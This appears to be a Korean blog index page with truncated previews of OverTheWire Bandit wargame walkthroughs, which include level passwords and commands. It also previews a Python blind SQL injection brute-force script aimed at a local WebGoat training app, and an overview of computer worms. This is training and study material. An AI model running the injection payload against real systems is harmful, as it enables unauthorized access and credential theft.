Bandit Level 13 → Level 14 풀이
·
카테고리 없음
Level Goal The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on Commands you may need to solve this level ssh, telnet, nc, openssl, s_client,..
Bandit Level 12 → Level 13 풀이
·
카테고리 없음
Level Goal The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!) Commands you may need to solve this level gre..
Bandit Level 11 → Level 12 풀이
·
카테고리 없음
Level Goal The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions Commands you may need to solve this level grep, sort, uniq, strings, base64, tr, tar, gzip, bzip2, xxd Helpful Reading Material Rot13 on Wikipedia 0. bandit11 로그인 IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR 1. tr 활용 bandit11@bandit:~$ cat data.tx..
Bandit Level 10 → Level 11 풀이
·
카테고리 없음
Level Goal The password for the next level is stored in the file data.txt, which contains base64 encoded data Commands you may need to solve this level grep, sort, uniq, strings, base64, tr, tar, gzip, bzip2, xxd Helpful Reading Material Base64 on Wikipedia 0. bandit10 로그인 truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk 1. base64 활용 bandit10@bandit:~$ base64 -d data.txt The password is IFukwKGsFW8MOq3IRFqrxE1h..
Bandit Level 9 → Level 10 풀이
·
카테고리 없음
Level Goal The password for the next level is stored in the file data.txt in one of the few human-readable strings, beginning with several ‘=’ characters. Commands you may need to solve this level grep, sort, uniq, strings, base64, tr, tar, gzip, bzip2, xxd 0. bandit9 로그인 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR 1, strings grep 활용 bandit9@bandit:~$ strings data.txt | grep = 2========== the ========== pa..
Bandit Level 8 → Level 9 풀이
·
카테고리 없음
Level Goal The password for the next level is stored in the file data.txt and is the only line of text that occurs only once Commands you may need to solve this level grep, sort, uniq, strings, base64, tr, tar, gzip, bzip2, xxd Helpful Reading Material The unix commandline: pipes and redirects 0. bandit8 로그인 cvX2JJa4CFALtqS87jk27qwqGhBM9plV 1. sort uniq 사용 bandit8@bandit:~$ sort data.txt | uniq ..
Bandit Level 7 → Level 8 풀이
·
카테고리 없음
Level Goal The password for the next level is stored in the file data.txt next to the word millionth Commands you may need to solve this level grep, sort, uniq, strings, base64, tr, tar, gzip, bzip2, xxd 0. bandit7 로그인 HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs 1. 파일찾기 bandit7@bandit:~$ cat data.txt | grep millionth millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV 2. bandit8 비밀번호 cvX2JJa4CFALtqS87jk27qwqGhBM9plV
Bandit Level 6 → Level 7 풀이
·
카테고리 없음
Level Goal The password for the next level is stored somewhere on the server and has all of the following properties: owned by user bandit7 owned by group bandit6 33 bytes in size Commands you may need to solve this level ls, cd, cat, file, du, find, grep 0. bandit6 로그인 DXjZPULLxYr17uwoI01bNLQbtFemEgo7 1. find 명령어사용 bandit6@bandit:~$ find / -group bandit6 -user bandit7 -size 33c /var/lib/dpkg/in..
[파이썬] WebGoat Brute Force 파이썬 코드
·
🤖정보보안/❤️레드팀
import requests password = str() cre = "created" url = "http://localhost:8080/WebGoat/SqlInjection/challenge" cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'} print ('[*] Get password length...') password_length = int() for length in range(1,30): datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'conf..
웜(Warm)이란
·
카테고리 없음
1. 개요 웜은 스스로 복제하는 프로그램으로서 독자적으로 실행이 된다. 1999년 이메일 주소를 수집하고 스스로 전달되는 형태로 인터넷 웜이 출현하며 용어가 알려지게 되었다. 네트워크를 통해 자신의 복사본을 전송, 네트워크 손상을 시키며 대역폭을 잠식한다고 한다. 대상 컴퓨터에서만 활동한다. 그 외에 호스트 시스템에서 파일을 지우거나 암호화, 이메일을 통해 문서전달을 하며 백도어와 같이 동작하는 경우도 있다. 웜의 확산을 막기위해서는 알려진 취약한 네트워크 프로토콜을 차단하고 취약한 어플리케이션 버전을 패치를 권장한다. 또한 다른 컴퓨터의 확산을 막기위해 기본공유 폴더 해제와 윈도우 계정 패스워드 설정을 권장한다. cmd창에서 net share 명령어를 입력하게 되면 현재 공유중인 폴더 및 디바이스를 확..